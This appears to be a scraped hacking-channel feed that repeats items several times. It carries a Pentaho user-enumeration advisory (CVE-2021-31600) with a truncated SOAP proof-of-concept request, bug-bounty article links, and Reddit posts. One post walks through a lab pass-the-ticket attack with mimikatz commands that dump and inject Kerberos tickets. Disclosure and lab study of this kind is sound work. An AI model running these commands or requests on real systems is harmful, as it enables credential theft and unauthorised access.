Exploit Collector
Backdoor.Win32.Jokerdoor Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Jokerdoor Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Jokerdoor Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control
___________________________
@hacking_Attack
@Hacking_Video
Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration
https://4.bp.blogspot.com/-dyIqvjR3K84/WWlvfXt5NkI/AAAAAAAAIQA/Fvmwfk3J4TgcxqdY3USv0_rN_ZW9VtW1ACLcBGAs/s1600/h85.png
Pentaho implements a series of web services using the SOAP protocol to allow scripting interaction with the backend server. HAWSEC identified that the services userRoleListService and ServiceAction exposed through the /pentaho/webservices/userRoleListService and /pentaho/ServiceAction?action=SecurityDetails endpoints are not enforcing sufficient access controls. Specifically, an authenticated user can list all application usernames present in the Jackrabbit Repository.
MD5 |
Download
Product: Pentaho Business Analytics / Pentaho Business Server
Vendor / Manufacturer: Hitachi Vantara
Affected Version(s): <=
Vulnerability Type: Jackrabbit User Enumeration
Solution Status: Fix Released on public GitHub repository
Manufacturer Notification: 8th February 2021
Solution Date: Wont fix
Public Disclosure: 01 November 2021
CVE Reference: CVE-2021-31600
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka
--- ### --- ### ---
Product Description:
Pentaho is business intelligence (BI) software that provides data
integration, OLAP services, reporting, information dashboards, data mining
and extract, transform, load (ETL) capabilities. Its headquarters are in
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and
in 2017 became part of Hitachi Vantara.
( Source: https://en.wikipedia.org/wiki/Pentaho )
--- ### --- ### ---
Vulnerability Details:
Pentaho implements a series of web services using the SOAP protocol to
allow scripting interaction with the backend server. HAWSEC identified that
the services userRoleListService and ServiceAction exposed through the
"/pentaho/webservices/userRoleListService" and
"/pentaho/ServiceAction?action=SecurityDetails" endpoints are not enforcing
sufficient access controls. Specifically, an authenticated user can list
all application usernames present in the Jackrabbit Repository.
--- ### --- ### ---
Proof of Concept (PoC):
See Ginger ( https://github.com/HawSec/ginger )
or
--- ~~~ --- ~~~ ---
POST /pentaho/webservices/userRoleListService HTTP/1.1
Host: localhost:8080
Connection: close
Cookie: JSESSIONID=878BCFF82EC40D06F72D64172CAC98B4;
SOAPAction:
Content-Type: text/xml; charset=UTF-8
Content-Length: 244
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ws="http://ws.userrole.security.platform.pentaho.org/">
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration
https://4.bp.blogspot.com/-dyIqvjR3K84/WWlvfXt5NkI/AAAAAAAAIQA/Fvmwfk3J4TgcxqdY3USv0_rN_ZW9VtW1ACLcBGAs/s1600/h85.png
Pentaho implements a series of web services using the SOAP protocol to allow scripting interaction with the backend server. HAWSEC identified that the services userRoleListService and ServiceAction exposed through the /pentaho/webservices/userRoleListService and /pentaho/ServiceAction?action=SecurityDetails endpoints are not enforcing sufficient access controls. Specifically, an authenticated user can list all application usernames present in the Jackrabbit Repository.
MD5 |
4473d7f48fb807803a782756210b0a90Download
Product: Pentaho Business Analytics / Pentaho Business Server
Vendor / Manufacturer: Hitachi Vantara
Affected Version(s): <=
Vulnerability Type: Jackrabbit User Enumeration
Solution Status: Fix Released on public GitHub repository
Manufacturer Notification: 8th February 2021
Solution Date: Wont fix
Public Disclosure: 01 November 2021
CVE Reference: CVE-2021-31600
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka
--- ### --- ### ---
Product Description:
Pentaho is business intelligence (BI) software that provides data
integration, OLAP services, reporting, information dashboards, data mining
and extract, transform, load (ETL) capabilities. Its headquarters are in
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and
in 2017 became part of Hitachi Vantara.
( Source: https://en.wikipedia.org/wiki/Pentaho )
--- ### --- ### ---
Vulnerability Details:
Pentaho implements a series of web services using the SOAP protocol to
allow scripting interaction with the backend server. HAWSEC identified that
the services userRoleListService and ServiceAction exposed through the
"/pentaho/webservices/userRoleListService" and
"/pentaho/ServiceAction?action=SecurityDetails" endpoints are not enforcing
sufficient access controls. Specifically, an authenticated user can list
all application usernames present in the Jackrabbit Repository.
--- ### --- ### ---
Proof of Concept (PoC):
See Ginger ( https://github.com/HawSec/ginger )
or
--- ~~~ --- ~~~ ---
POST /pentaho/webservices/userRoleListService HTTP/1.1
Host: localhost:8080
Connection: close
Cookie: JSESSIONID=878BCFF82EC40D06F72D64172CAC98B4;
SOAPAction:
Content-Type: text/xml; charset=UTF-8
Content-Length: 244
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ws="http://ws.userrole.security.platform.pentaho.org/">
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
UNAUTHENTICATED ACCESS TO CLOUD PORTAL — A WITHOUT ️
https://medium.com/techiepedia/unauthenticated-access-to-cloud-portal-a-without-%EF%B8%8F-9f29c387b937?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/techiepedia/unauthenticated-access-to-cloud-portal-a-without-%EF%B8%8F-9f29c387b937?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
APPROACH :
Everything changed to an offline mode including my exams so I don’t have time to hunt for bugs but I have a VPS which runs 24/7. I…
Everything changed to an offline mode including my exams so I don’t have time to hunt for bugs but I have a VPS which runs 24/7. I…Continue reading on Techiepedia » (https://medium.com/techiepedia/unauthenticated-access-to-cloud-portal-a-without-%EF%B8%8F-9f29c387b937?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
APPROACH :
Everything changed to an offline mode including my exams so I don’t have time to hunt for bugs but I have a VPS which runs 24/7. I…
How to write a good and acceptable report :)
https://nvermaa.medium.com/how-to-write-a-good-and-acceptable-report-f7320bb231b6?source=rss------bug_bounty-5
Many people have been asking me this question on twitter about report writing…documentation is very crucial part in any security…Continue reading on Medium » (https://nvermaa.medium.com/how-to-write-a-good-and-acceptable-report-f7320bb231b6?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://nvermaa.medium.com/how-to-write-a-good-and-acceptable-report-f7320bb231b6?source=rss------bug_bounty-5
Many people have been asking me this question on twitter about report writing…documentation is very crucial part in any security…Continue reading on Medium » (https://nvermaa.medium.com/how-to-write-a-good-and-acceptable-report-f7320bb231b6?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to write a good and acceptable report :)
Many people have been asking me this question on twitter about report writing…documentation is very crucial part in any security…
CVE-2021–40577
https://medium.com/@J03KR/cve-2021-40577-ec96a831ba71?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@J03KR/cve-2021-40577-ec96a831ba71?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
CVE-2021–40577
Stored Cross-Site Scripting.
Stored Cross-Site Scripting.Continue reading on Medium » (https://medium.com/@J03KR/cve-2021-40577-ec96a831ba71?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
CVE-2021–40577
Stored Cross-Site Scripting.
A Konami Code for Vuln Chaining Combos
https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
A Konami Code for Vuln Chaining Combos
Automate finding relational vulnerabilities for a more accurate risk rating
Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium » (https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
A Konami Code for Vuln Chaining Combos
Automate finding relational vulnerabilities for a more accurate risk rating
A Konami Code for Vuln Chaining Combos
Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium »
Read more...
Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium »
Read more...
A question about internal(network?) pentesting.
https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/
Hey everyone i wonder your thoughts about internal pentesting and platforms like hackthebox(not the prolabs, just the machines). First of all one might say that there isn't such a thing as internal pentesting, but what i mean is an assumed breach and assessment of the internal network. Is it possible to be not that good at htb and do an internal assessment? I dont like hacking the machines at htb, can only hack medium to hard boxes and during those times i mostly get bored after some time(not because machines are not challenging, quite the opposite, i get stuck). I am mostly interested in AD environment, coding injectors, c2 structures for easy tasks in different languages and analyze them in debuggers etc, in a home lab. For context: i dont work in IT, i am just a hobbiyst. Probably wont/can't switch to IT either. Just curious about your thoughts on platforms like htb. submitted by /u/throwforadvent (https://www.reddit.com/user/throwforadvent)
[link] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/) [comments] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/
Hey everyone i wonder your thoughts about internal pentesting and platforms like hackthebox(not the prolabs, just the machines). First of all one might say that there isn't such a thing as internal pentesting, but what i mean is an assumed breach and assessment of the internal network. Is it possible to be not that good at htb and do an internal assessment? I dont like hacking the machines at htb, can only hack medium to hard boxes and during those times i mostly get bored after some time(not because machines are not challenging, quite the opposite, i get stuck). I am mostly interested in AD environment, coding injectors, c2 structures for easy tasks in different languages and analyze them in debuggers etc, in a home lab. For context: i dont work in IT, i am just a hobbiyst. Probably wont/can't switch to IT either. Just curious about your thoughts on platforms like htb. submitted by /u/throwforadvent (https://www.reddit.com/user/throwforadvent)
[link] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/) [comments] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
r/redteamsec on Reddit: A question about internal(network?) pentesting.
Posted by u/throwforadvent - 1 vote and 12 comments
Having issues performing PTT with Windows 2019DC using mimikatz
https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/
Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using mimikatz in a simple lab environment that consists of. DC1 - domain controller on windows server 2019 Win10-1 - Up to date windows 10 Win10-2 - Up to data windows 10 To demo I first logged into Win10-2 with the DA account, logged off and then logged on as a domain user with local admin rights to the box. Defender is disabled because I'm just trying to demo what PTT looks like. Anyway here is what happens When I first logon and do a klist everything looks normal. ``C:\Users\sylvester>klist Current LogonId is 0:0x604779 Cached Tickets: (2) #0> Client: sylvester @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 11:10:00 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: DC1.LazerKittens.local #1> Client: sylvester @ LAZERKITTENS.LOCAL Server: LDAP/DC1.LazerKittens.local/LazerKittens.local @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/5/2021 11:10:20 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: DC1.LazerKittens.local`` Then I go ahead and run mimikatz, get debug using privilege::debug and dump the tickets using sekurlsa::tickets /export mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ---snip After I export the tickets I loaded the administrator accounts TGT ticket into memory using kerberos::ptt mimikatz # kerberos::ptt [0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi) File: '[0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi)': OK ###### go in to a command prompt by typing misc::cmd and klist again. As expected the administrator ticket is now in my kerberos cache. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>klist Current LogonId is 0:0x604756 Cached Tickets: (1) #0> Client: Administrator @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 10:09:39 (local) End Time: 11/5/2021 20:09:39 (local) Renew Time: 11/12/2021 10:09:39 (local) Session Key Type: Kerberos DES-CBC-CRC Cache Flags: 0x1 -> PRIMARY Kdc Called: So at this point I'm thinking cool, all I need to do now is access my DC is type in dir \DC1\c$. However, when I attempt that I get the following error message. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>dir \dc1\c$ The system cannot contact a domain controller to service the authentication request. Please try again later. If I do a klist purge and try to access the dc again I get the expected access is denied. Thanks in advance for your help! submitted by /u/Mufassa810 (https://www.reddit.com/user/Mufassa810)
[link] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/) [comments] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/
Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using mimikatz in a simple lab environment that consists of. DC1 - domain controller on windows server 2019 Win10-1 - Up to date windows 10 Win10-2 - Up to data windows 10 To demo I first logged into Win10-2 with the DA account, logged off and then logged on as a domain user with local admin rights to the box. Defender is disabled because I'm just trying to demo what PTT looks like. Anyway here is what happens When I first logon and do a klist everything looks normal. ``C:\Users\sylvester>klist Current LogonId is 0:0x604779 Cached Tickets: (2) #0> Client: sylvester @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 11:10:00 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: DC1.LazerKittens.local #1> Client: sylvester @ LAZERKITTENS.LOCAL Server: LDAP/DC1.LazerKittens.local/LazerKittens.local @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/5/2021 11:10:20 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: DC1.LazerKittens.local`` Then I go ahead and run mimikatz, get debug using privilege::debug and dump the tickets using sekurlsa::tickets /export mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ---snip After I export the tickets I loaded the administrator accounts TGT ticket into memory using kerberos::ptt mimikatz # kerberos::ptt [0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi) File: '[0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi)': OK ###### go in to a command prompt by typing misc::cmd and klist again. As expected the administrator ticket is now in my kerberos cache. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>klist Current LogonId is 0:0x604756 Cached Tickets: (1) #0> Client: Administrator @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 10:09:39 (local) End Time: 11/5/2021 20:09:39 (local) Renew Time: 11/12/2021 10:09:39 (local) Session Key Type: Kerberos DES-CBC-CRC Cache Flags: 0x1 -> PRIMARY Kdc Called: So at this point I'm thinking cool, all I need to do now is access my DC is type in dir \DC1\c$. However, when I attempt that I get the following error message. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>dir \dc1\c$ The system cannot contact a domain controller to service the authentication request. Please try again later. If I do a klist purge and try to access the dc again I get the expected access is denied. Thanks in advance for your help! submitted by /u/Mufassa810 (https://www.reddit.com/user/Mufassa810)
[link] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/) [comments] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Having issues performing PTT with Windows 2019DC using mimikatz
Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using...